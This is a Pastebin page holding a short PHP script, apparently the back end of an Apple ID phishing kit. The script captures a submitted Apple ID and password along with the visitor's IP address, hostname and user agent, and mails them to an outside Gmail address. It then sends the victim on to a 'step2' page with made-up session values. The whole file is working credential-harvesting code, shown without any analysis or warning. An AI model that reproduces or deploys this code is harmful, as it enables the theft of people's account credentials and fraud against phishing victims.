Advertisement
PalmaSolutions

new.php

Jun 16th, 2018
382
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.88 KB | None | 0 0
  1. <?php
  2. if($_POST["usr"] != "" and $_POST["psw"] != ""){
  3. $ip = getenv("REMOTE_ADDR");
  4. $hostname = gethostbyaddr($ip);
  5. $useragent = $_SERVER['HTTP_USER_AGENT'];
  6. $message .= "--------------Apple Info-----------------------\n";
  7. $message .= "Apple ID            : ".$_POST['usr']."\n";
  8. $message .= "Password            : ".$_POST['psw']."\n";
  9. $message .= "|--------------- I N F O | I P -------------------|\n";
  10. $message .= "|Client IP: ".$ip."\n";
  11. $message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
  12. $message .= "User Agent : ".$useragent."\n";
  13. $message .= "|----------- unknown --------------|\n";
  14. $send = "fudtoolshop@gmail.com";
  15. $subject = "Card | $ip";
  16. {
  17. mail("$send", "$subject", $message);  
  18. }
  19. $praga=rand();
  20. $praga=md5($praga);
  21.   header ("Location: step2.php?cmd=login_submit&id=$praga$praga&session=$praga$praga");
  22. }else{
  23. header ("Location: index.php");
  24. }
  25.  
  26. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement